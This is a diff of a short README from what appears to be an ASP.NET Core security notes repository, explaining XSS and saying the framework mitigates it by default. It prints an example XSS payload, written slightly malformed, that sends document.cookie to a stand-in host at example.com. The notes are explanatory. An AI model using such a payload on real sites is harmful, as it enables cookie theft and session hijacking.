ikbalkazanc/Asp.NetCore-Security/README.md

 # Attacks
 ## XSS
 This is a kind of script vulnerability.
 Done by integrate harmful script in our HTML and JS files.
-There are 3 ways.
+Actually There are 3 ways.
 But we can apply same solution all of them.
 Net Core provide solution as default.
 Again thanks great dot net.
 Not need to define in `Startup.cs` file. if we want we can disable it.
 ```html
 <script> new Image().\"http://example.com/readCookie/?account=\"+document.cookie\"</script>
 ```